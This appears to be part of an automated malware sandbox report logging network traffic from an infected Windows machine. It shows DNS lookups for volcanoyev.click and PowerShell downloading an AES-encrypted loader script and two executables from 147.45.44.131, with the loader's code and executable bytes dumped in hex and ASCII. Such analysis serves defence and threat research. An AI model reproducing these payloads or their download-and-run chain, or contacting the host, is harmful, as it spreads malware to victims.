                                                          Dec 24, 2024 02:18:44.807871103 CET49730443192.168.2.8172.67.195.241

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 24, 2024 02:18:18.895083904 CET6222153192.168.2.81.1.1.1
                                                          Dec 24, 2024 02:18:19.208827972 CET53622211.1.1.1192.168.2.8

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 24, 2024 02:18:18.895083904 CET192.168.2.81.1.1.10xfaf3Standard query (0)volcanoyev.clickA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 24, 2024 02:18:19.208827972 CET1.1.1.1192.168.2.80xfaf3No error (0)volcanoyev.click172.67.195.241A (IP address)IN (0x0001)false
                                                          Dec 24, 2024 02:18:19.208827972 CET1.1.1.1192.168.2.80xfaf3No error (0)volcanoyev.click104.21.52.56A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • volcanoyev.click
                                                          • 147.45.44.131

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.849706147.45.44.131808068C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 24, 2024 02:18:13.778759003 CET275OUTGET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:15.053478956 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:14 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 0d 0a 24 69 6f 50 51 70 6d 53 73 51 76 20 3d 20 27 72 35 4b 77 4d 4c 67 45 69 6f 33 63 6d 48 36 4a 64 59 51 72 70 37 6a 6b 78 6d 41 34 72 73 4e 33 63 70 4b 4a 69 6f 4b 6c 33 2f 6b 3d 27 0d 0a 24 57 43 45 62 47 5a 4b 35 65 42 20 3d 20 27 44 4e 45 36 41 52 55 59 57 58 76 4c 6d 54 6d 2f 48 77 77 52 68 77 3d 3d 27 0d 0a 24 43 79 72 78 6d 61 55 4f 41 32 20 3d 20 27 76 6f 6e 5a 31 74 6b 44 69 30 76 35 77 77 52 4f 6a 43 35 54 41 71 49 37 57 4a 52 72 31 39 51 6b 74 34 44 59 6f 6e 32 37 6d 62 67 41 4b 6f 75 73 49 62 51 6a 70 43 6e 32 73 38 79 2f 33 44 4f 47 63 32 73 50 65 6e 49 33 6e 2b 34 75 50 45 6f 2f 4b 6e 36 4b 48 74 61 54 4b 30 70 34 37 71 36 56 37 53 36 5a 4d 69 53 64 76 6a 75 42 51 51 39 52 70 4b 69 7a 6d 6d 2b 6b 4e 52 63 6b 50 4e 52 43 53 62 2f 76 77 4d 36 71 54 57 59 69 2f 33 54 38 65 44 35 44 33 33 30 44 35 2f 73 36 65 6b 44 49 32 32 74 68 6a 4d 55 70 48 43 4a 50 64 48 74 64 4c 33 53 65 62 6e 70 64 73 47 56 71 72 61 6e 56 32 38 32 64 57 65 72 67 54 64 6a 55 49 63 46 61 6a 55 31 64 73 66 2f 6e 69 [TRUNCATED]
                                                          Data Ascii: $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='$WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='$CyrxmaUOA2 = 'vonZ1tkDi0v5wwROjC5TAqI7WJRr19Qkt4DYon27mbgAKousIbQjpCn2s8y/3DOGc2sPenI3n+4uPEo/Kn6KHtaTK0p47q6V7S6ZMiSdvjuBQQ9RpKizmm+kNRckPNRCSb/vwM6qTWYi/3T8eD5D330D5/s6ekDI22thjMUpHCJPdHtdL3SebnpdsGVqranV282dWergTdjUIcFajU1dsf/niogfdmth46rEOH5t5XFH+VBH5RH61SqZli1pn0Uv3xaTU2CHqQJOzapCD7QzltSUHpdV4SQc6o2W8qssurm0xLUSLDVWKXHUUjVxo2CC0zke/lAWyh4djJzxh/Yk6UHkyFe4N3mqLeUfQMIyxiTFRDb8MMto1LcSrijzdYfd1yV7xAR3efP1TkRvR9QCQwA89KvAcJmso8SGo6HQJ9un7QcyXBENpWnOOkkrHOWJJmB3vELr40OSYs5FeLDIL8fflJhrQ7KAL/a5hHSd5PuW+n+pnJ7em+Sj6ehLQRGHwRN0cAEdjInGTE0HbPY6PveHgQ9CxIl9Tc03lt+ho8wGOTezgJHPmVtYEjU8cno7ttnI6ySzMhdhzWnndRp9+LQvGBgQXLXt0pFfEwpf4zQ='function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) { $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv) $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB) $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                          Dec 24, 2024 02:18:15.053525925 CET867INData Raw: 24 70 37 68 78 65 61 53 35 67 32 29 0d 0a 20 20 20 20 24 61 51 68 58 42 69 7a 52 41 78 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20
                                                          Data Ascii: $p7hxeaS5g2) $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create() $aQhXBizRAx.Key = $cTaSLj6r0V $aQhXBizRAx.IV = $F1V1q6ulZs $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $gBOWS1t7hT = $
                                                          Dec 24, 2024 02:18:15.424038887 CET156OUTGET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:15.825175047 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY"0 @ `O H.text `.rsrc@@.reloc@BHx"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0HiY(!o" +%o#
                                                          Dec 24, 2024 02:18:15.825540066 CET1236INData Raw: 00 0a 5d 13 04 08 09 02 09 91 02 02 8e 69 17 59 91 1f 70 61 61 07 11 04 91 61 d2 9c 09 17 58 0d 09 06 32 d7 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01 00 00 06 2a 1e 02 28 16 00 00 0a 2a 1e 02 28 16 00 00 0a 2a 00 13 30 02 00 4c 00 00 00 00 00 00 00
                                                          Data Ascii: ]iYpaaaX2*(*(*(*(*0L(rp(o(rp(o(rp(o*BSJBv4.0.30319l#~#Strings#US|#
                                                          Dec 24, 2024 02:18:15.825561047 CET1236INData Raw: 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67 45 6e 64 69 61 6e 55 6e 69 63 6f 64 65 00 49 6e 76
                                                          Data Ascii: llections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyF
                                                          Dec 24, 2024 02:18:15.826459885 CET1236INData Raw: 00 74 00 62 00 32 00 4a 00 4b 00 4d 00 6c 00 6c 00 53 00 65 00 57 00 38 00 79 00 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51
                                                          Data Ascii: tb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVE
                                                          Dec 24, 2024 02:18:15.826472998 CET1236INData Raw: 4a 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4f 00 47 00 46 00 43 00 57 00 55 00 5a 00 56 00 51 00 6a 00 52 00 42 00 52 00 7a 00 42 00 4a 00 55 00 56 00 68 00 55 00 4f 00 46 00 64 00
                                                          Data Ascii: JZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllR
                                                          Dec 24, 2024 02:18:15.827389956 CET1236INData Raw: 65 00 6e 00 52 00 76 00 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 6c 00 61 00 59 00 6e 00 70 00 34 00 56 00 6b 00 70 00 72 00 53 00 56 00 64 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 68 00 61 00 56 00
                                                          Data Ascii: enRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVk
                                                          Dec 24, 2024 02:18:15.827444077 CET1236INData Raw: 46 00 42 00 4f 00 56 00 68 00 46 00 62 00 55 00 46 00 4d 00 51 00 6a 00 42 00 46 00 4e 00 6c 00 6c 00 45 00 52 00 6c 00 52 00 42 00 56 00 55 00 6c 00 4d 00 52 00 46 00 5a 00 6f 00 57 00 45 00 74 00 74 00 4f 00 44 00 68 00 52 00 61 00 46 00 70 00
                                                          Data Ascii: FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2
                                                          Dec 24, 2024 02:18:15.828186035 CET1236INData Raw: 55 00 57 00 68 00 61 00 56 00 6b 00 70 00 6f 00 53 00 6b 00 56 00 44 00 4d 00 45 00 46 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6c 00 6c 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6c 00 70 00 42 00 4d 00
                                                          Data Ascii: UWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3Tl
                                                          Dec 24, 2024 02:18:15.834485054 CET992INData Raw: 6c 00 47 00 61 00 46 00 6c 00 42 00 51 00 54 00 42 00 56 00 55 00 56 00 4a 00 33 00 57 00 6c 00 4e 00 46 00 52 00 6b 00 31 00 53 00 52 00 56 00 4a 00 77 00 56 00 6c 00 70 00 43 00 64 00 45 00 4e 00 43 00 4d 00 6a 00 41 00 76 00 55 00 57 00 78 00
                                                          Data Ascii: lGaFlBQTBVUVJ3WlNFRk1SRVJwVlpCdENCMjAvUWxRQVlBUlRFQnBDQzFnQkpnQkRCRkFIRUdVY2ZBY2FRa1FIQkJZY2FCWVdBRThXQjBVaWRBdENGbE1NU3cx
                                                          Dec 24, 2024 02:18:15.836971045 CET1236INData Raw: 4e 00 43 00 61 00 31 00 46 00 49 00 52 00 56 00 56 00 57 00 59 00 31 00 42 00 58 00 4f 00 44 00 68 00 52 00 61 00 46 00 70 00 44 00 55 00 57 00 74 00 5a 00 53 00 47 00 4a 00 34 00 55 00 6c 00 68 00 47 00 62 00 45 00 35 00 44 00 51 00 6d 00 78 00
                                                          Data Ascii: NCa1FIRVVWY1BXODhRaFpDUWtZSGJ4UlhGbE5DQmxNWll3VlhGbE5DQUZrYWFrSjFFRk1ERmxNbGRBMVZCMFVSSmxNWll3VlhGbE5LRVVJSGJ3eFJRbGNTRWxv
                                                          Dec 24, 2024 02:18:16.146622896 CET156OUTGET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:16.547559977 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:16 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d [TRUNCATED]
                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gP@`@ 8.text6 `.rdata "@@.data0P@.reloc8 :b@B


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.849707147.45.44.131807228C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 24, 2024 02:18:14.135981083 CET275OUTGET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:15.389766932 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Raw: 0d 0a 24 69 6f 50 51 70 6d 53 73 51 76 20 3d 20 27 72 35 4b 77 4d 4c 67 45 69 6f 33 63 6d 48 36 4a 64 59 51 72 70 37 6a 6b 78 6d 41 34 72 73 4e 33 63 70 4b 4a 69 6f 4b 6c 33 2f 6b 3d 27 0d 0a 24 57 43 45 62 47 5a 4b 35 65 42 20 3d 20 27 44 4e 45 36 41 52 55 59 57 58 76 4c 6d 54 6d 2f 48 77 77 52 68 77 3d 3d 27 0d 0a 24 43 79 72 78 6d 61 55 4f 41 32 20 3d 20 27 76 6f 6e 5a 31 74 6b 44 69 30 76 35 77 77 52 4f 6a 43 35 54 41 71 49 37 57 4a 52 72 31 39 51 6b 74 34 44 59 6f 6e 32 37 6d 62 67 41 4b 6f 75 73 49 62 51 6a 70 43 6e 32 73 38 79 2f 33 44 4f 47 63 32 73 50 65 6e 49 33 6e 2b 34 75 50 45 6f 2f 4b 6e 36 4b 48 74 61 54 4b 30 70 34 37 71 36 56 37 53 36 5a 4d 69 53 64 76 6a 75 42 51 51 39 52 70 4b 69 7a 6d 6d 2b 6b 4e 52 63 6b 50 4e 52 43 53 62 2f 76 77 4d 36 71 54 57 59 69 2f 33 54 38 65 44 35 44 33 33 30 44 35 2f 73 36 65 6b 44 49 32 32 74 68 6a 4d 55 70 48 43 4a 50 64 48 74 64 4c 33 53 65 62 6e 70 64 73 47 56 71 72 61 6e 56 32 38 32 64 57 65 72 67 54 64 6a 55 49 63 46 61 6a 55 31 64 73 66 2f 6e 69 [TRUNCATED]
                                                          Data Ascii: $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='$WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='$CyrxmaUOA2 = 'vonZ1tkDi0v5wwROjC5TAqI7WJRr19Qkt4DYon27mbgAKousIbQjpCn2s8y/3DOGc2sPenI3n+4uPEo/Kn6KHtaTK0p47q6V7S6ZMiSdvjuBQQ9RpKizmm+kNRckPNRCSb/vwM6qTWYi/3T8eD5D330D5/s6ekDI22thjMUpHCJPdHtdL3SebnpdsGVqranV282dWergTdjUIcFajU1dsf/niogfdmth46rEOH5t5XFH+VBH5RH61SqZli1pn0Uv3xaTU2CHqQJOzapCD7QzltSUHpdV4SQc6o2W8qssurm0xLUSLDVWKXHUUjVxo2CC0zke/lAWyh4djJzxh/Yk6UHkyFe4N3mqLeUfQMIyxiTFRDb8MMto1LcSrijzdYfd1yV7xAR3efP1TkRvR9QCQwA89KvAcJmso8SGo6HQJ9un7QcyXBENpWnOOkkrHOWJJmB3vELr40OSYs5FeLDIL8fflJhrQ7KAL/a5hHSd5PuW+n+pnJ7em+Sj6ehLQRGHwRN0cAEdjInGTE0HbPY6PveHgQ9CxIl9Tc03lt+ho8wGOTezgJHPmVtYEjU8cno7ttnI6ySzMhdhzWnndRp9+LQvGBgQXLXt0pFfEwpf4zQ='function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) { $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv) $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB) $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                          Dec 24, 2024 02:18:15.389960051 CET867INData Raw: 24 70 37 68 78 65 61 53 35 67 32 29 0d 0a 20 20 20 20 24 61 51 68 58 42 69 7a 52 41 78 20 3d 20 5b 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 41 65 73 5d 3a 3a 43 72 65 61 74 65 28 29 0d 0a 20 20 20 20
                                                          Data Ascii: $p7hxeaS5g2) $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create() $aQhXBizRAx.Key = $cTaSLj6r0V $aQhXBizRAx.IV = $F1V1q6ulZs $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $gBOWS1t7hT = $
                                                          Dec 24, 2024 02:18:15.481246948 CET156OUTGET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:15.882447958 CET1236INHTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:15 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 ad 84 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 a4 00 00 00 08 00 00 00 00 00 00 fe c2 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac c2 00 00 4f 00 00 00 00 e0 00 00 ec 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 c2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY"0 @ `O H.text `.rsrc@@.reloc@BHx"0S(rp(o(r3p(os%oo~o~(*(*0(rp(o(~((osso(rp(oo&o(r-p(oo&o%oo(rWp(oo(rqp(oo%%o &*(*0HiY(!o" +%o#
                                                          Dec 24, 2024 02:18:15.882595062 CET1236INData Raw: 00 0a 5d 13 04 08 09 02 09 91 02 02 8e 69 17 59 91 1f 70 61 61 07 11 04 91 61 d2 9c 09 17 58 0d 09 06 32 d7 08 2a 1e 02 28 16 00 00 0a 2a 1a 28 01 00 00 06 2a 1e 02 28 16 00 00 0a 2a 1e 02 28 16 00 00 0a 2a 00 13 30 02 00 4c 00 00 00 00 00 00 00
                                                          Data Ascii: ]iYpaaaX2*(*(*(*(*0L(rp(o(rp(o(rp(o*BSJBv4.0.30319l#~#Strings#US|#
                                                          Dec 24, 2024 02:18:15.882607937 CET1236INData Raw: 6c 6c 65 63 74 69 6f 6e 73 2e 53 70 65 63 69 61 6c 69 7a 65 64 00 47 65 74 4d 65 74 68 6f 64 00 43 6f 6d 70 69 6c 65 41 73 73 65 6d 62 6c 79 46 72 6f 6d 53 6f 75 72 63 65 00 67 65 74 5f 42 69 67 45 6e 64 69 61 6e 55 6e 69 63 6f 64 65 00 49 6e 76
                                                          Data Ascii: llections.SpecializedGetMethodCompileAssemblyFromSourceget_BigEndianUnicodeInvokeGetTypeMethodBaseGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyF
                                                          Dec 24, 2024 02:18:15.883373022 CET1236INData Raw: 00 74 00 62 00 32 00 4a 00 4b 00 4d 00 6c 00 6c 00 53 00 65 00 57 00 38 00 79 00 63 00 6d 00 70 00 4f 00 5a 00 32 00 35 00 57 00 52 00 47 00 68 00 4b 00 64 00 6d 00 56 00 32 00 54 00 6a 00 68 00 53 00 4d 00 6d 00 74 00 31 00 4f 00 47 00 39 00 51
                                                          Data Ascii: tb2JKMllSeW8ycmpOZ25WRGhKdmV2TjhSMmt1OG9QQ0JvbmhtcHpGYjJHWXFQaUxoSnE=RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVE
                                                          Dec 24, 2024 02:18:15.883385897 CET496INData Raw: 4a 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4f 00 47 00 46 00 43 00 57 00 55 00 5a 00 56 00 51 00 6a 00 52 00 42 00 52 00 7a 00 42 00 4a 00 55 00 56 00 68 00 55 00 4f 00 46 00 64 00
                                                          Data Ascii: JZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllR
                                                          Dec 24, 2024 02:18:15.884020090 CET1236INData Raw: 42 00 47 00 62 00 45 00 30 00 31 00 55 00 48 00 68 00 5a 00 4d 00 6d 00 46 00 52 00 65 00 45 00 46 00 43 00 4d 00 46 00 46 00 58 00 54 00 6d 00 78 00 72 00 4d 00 32 00 5a 00 34 00 57 00 6c 00 52 00 46 00 55 00 6a 00 52 00 4d 00 52 00 45 00 56 00
                                                          Data Ascii: BGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhF
                                                          Dec 24, 2024 02:18:15.884032011 CET1236INData Raw: 57 00 46 00 5a 00 52 00 5a 00 45 00 4e 00 4f 00 62 00 44 00 52 00 52 00 51 00 6a 00 46 00 6a 00 55 00 6c 00 4a 00 52 00 4d 00 56 00 6c 00 47 00 62 00 45 00 31 00 68 00 52 00 6d 00 68 00 53 00 57 00 6b 00 4d 00 79 00 5a 00 31 00 64 00 52 00 61 00
                                                          Data Ascii: WFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaF
                                                          Dec 24, 2024 02:18:15.884943962 CET1236INData Raw: 46 00 49 00 52 00 56 00 56 00 4e 00 57 00 56 00 6c 00 36 00 57 00 6d 00 56 00 46 00 52 00 6b 00 31 00 45 00 51 00 6d 00 35 00 4a 00 55 00 57 00 46 00 6e 00 5a 00 46 00 4a 00 42 00 4d 00 45 00 6c 00 49 00 55 00 32 00 34 00 34 00 59 00 6d 00 4e 00
                                                          Data Ascii: FIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFS
                                                          Dec 24, 2024 02:18:15.884958029 CET1236INData Raw: 64 00 46 00 6c 00 47 00 62 00 56 00 6c 00 58 00 52 00 55 00 4a 00 5a 00 51 00 6d 00 4a 00 6f 00 51 00 6c 00 52 00 42 00 4d 00 55 00 70 00 50 00 55 00 57 00 77 00 34 00 59 00 6d 00 4e 00 71 00 62 00 48 00 4a 00 52 00 62 00 46 00 56 00 4f 00 52 00
